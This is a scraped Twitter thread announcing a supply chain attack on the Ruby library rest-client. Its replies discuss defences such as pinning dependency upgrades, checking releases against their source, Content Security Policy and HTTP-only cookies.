PSA: Supply chain attack on rest-client, an extremely widely deployed Ruby library.https://github.com/rest-client/rest-client/issues/713 …
-
-
A mitigation here, which you will probably want anyhow, is to only upgrade dependencies based on explicit choice rather than slurping down upgrades optimistically. This mitigation is not normative in some development communities, which may pose some cultural challenges.
Show this thread -
Having your application evaluate code grabbed from Pastebin at runtime [0] will *also* pose some cultural challenges, though. [0] The attack payload here.
Show this thread
End of conversation
New conversation -
-
-
-
I’m not really convinced this is feasible for most companies, especially in NPM land. It’s not just reading the Github commits, it’s checking that what is released matches what is in Github.
-
For the browser I would first get a Content Security Policy in place to whitelist hosts your app can talk to/download JS from. HTTP only session cookies are good as well. It seems like a good CSP should totally mitigate this attack on the front end?
- 1 more reply
New conversation -
-
-
NPM is 1) wonderfully convenient and 2) absolutely terrifying.
Thanks. Twitter will use this to make your timeline better. UndoUndo
-
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.
